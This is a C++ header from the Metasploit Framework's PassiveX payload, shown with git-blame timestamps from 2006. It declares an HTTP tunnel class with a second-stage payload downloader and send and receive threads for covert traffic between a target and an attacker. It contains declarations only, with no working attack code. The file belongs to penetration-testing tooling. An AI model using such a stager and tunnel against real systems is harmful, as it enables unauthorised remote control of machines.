2006-01-05 02:41:40 +00:00
|
|
|
/*
|
|
|
|
* This file is part of the Metasploit Exploit Framework
|
|
|
|
* and is subject to the same licenses and copyrights as
|
|
|
|
* the rest of this package.
|
|
|
|
*/
|
|
|
|
#ifndef _PASSIVEX_HTTPTUNNEL_H
|
|
|
|
#define _PASSIVEX_HTTPTUNNEL_H
|
|
|
|
|
|
|
|
#define PASSIVEX_URI_SECOND_STAGE TEXT("/stage")
|
|
|
|
#define PASSIVEX_URI_TUNNEL_IN TEXT("/tunnel_in")
|
|
|
|
#define PASSIVEX_URI_TUNNEL_OUT TEXT("/tunnel_out")
|
|
|
|
|
|
|
|
#define PROFILE_CHECKPOINT(x) \
|
|
|
|
CPassiveX::Log("%s:%d:%lu: %s\n", __FILE__, __LINE__, GetTickCount(), x)
|
|
|
|
|
|
|
|
|
|
|
|
/*
|
|
|
|
* This class is responsible for managing the HTTP tunnel between a target host
|
|
|
|
* and the local machine.
|
|
|
|
*/
|
|
|
|
class HttpTunnel
|
|
|
|
{
|
|
|
|
public:
|
|
|
|
HttpTunnel();
|
|
|
|
~HttpTunnel();
|
|
|
|
|
|
|
|
// Initialization
|
|
|
|
DWORD Start(
|
|
|
|
IN LPSTR HttpHost,
|
2006-01-07 10:04:30 +00:00
|
|
|
IN LPSTR HttpUriBase,
|
|
|
|
IN LPSTR HttpSid,
|
2006-01-05 02:41:40 +00:00
|
|
|
IN USHORT HttpPort);
|
|
|
|
DWORD Stop();
|
|
|
|
protected:
|
|
|
|
// Internal Initialization
|
|
|
|
DWORD InitializeLocalConnection();
|
|
|
|
|
|
|
|
// Second stage loader
|
|
|
|
VOID DownloadSecondStage();
|
|
|
|
|
|
|
|
// Data transmission
|
|
|
|
DWORD TransmitToRemote(
|
|
|
|
IN PUCHAR Buffer,
|
|
|
|
IN ULONG BufferSize);
|
|
|
|
DWORD TransmitToLocal(
|
|
|
|
IN PUCHAR Buffer,
|
|
|
|
IN ULONG BufferSize);
|
|
|
|
|
|
|
|
DWORD TransmitHttpRequest(
|
|
|
|
IN LPTSTR Method,
|
|
|
|
IN LPTSTR Uri,
|
|
|
|
IN PVOID RequestPayload = NULL,
|
|
|
|
IN ULONG RequestPayloadLength = 0,
|
|
|
|
IN ULONG WaitResponseTimeout = 0,
|
|
|
|
OUT LPDWORD ResponseCode = NULL,
|
|
|
|
OUT PVOID *ResponsePayload = NULL,
|
|
|
|
OUT LPDWORD ResponsePayloadLength = NULL);
|
|
|
|
|
|
|
|
// Thread functions
|
|
|
|
static ULONG SendThreadFuncSt(
|
|
|
|
IN HttpTunnel *Tunnel);
|
|
|
|
ULONG SendThreadFunc();
|
|
|
|
static ULONG ReceiveThreadFuncSt(
|
|
|
|
IN HttpTunnel *Tunnel);
|
|
|
|
ULONG ReceiveThreadFunc();
|
|
|
|
|
|
|
|
static ULONG SecondStageThreadFuncSt(
|
|
|
|
IN HttpTunnel *Tunnel);
|
|
|
|
|
|
|
|
/**************
|
|
|
|
* Attributes *
|
|
|
|
**************/
|
|
|
|
|
|
|
|
// Remote host information
|
|
|
|
LPSTR HttpHost;
|
2006-01-07 10:04:30 +00:00
|
|
|
LPSTR HttpUriBase;
|
|
|
|
LPSTR HttpSid;
|
2006-01-05 02:41:40 +00:00
|
|
|
USHORT HttpPort;
|
|
|
|
|
|
|
|
// Sockets
|
|
|
|
WSADATA WsaData;
|
|
|
|
SOCKET LocalTcpListener;
|
|
|
|
SOCKET LocalTcpClientSide;
|
|
|
|
SOCKET LocalTcpServerSide;
|
|
|
|
|
|
|
|
// Internet context
|
|
|
|
HINTERNET InternetHandle;
|
|
|
|
|
|
|
|
// Stage attributes
|
|
|
|
PUCHAR SecondStage;
|
|
|
|
DWORD SecondStageSize;
|
|
|
|
|
|
|
|
// Threads
|
|
|
|
HANDLE SendThread;
|
|
|
|
HANDLE ReceiveThread;
|
|
|
|
HANDLE SecondStageThread;
|
|
|
|
};
|
|
|
|
|
|
|
|
#endif
|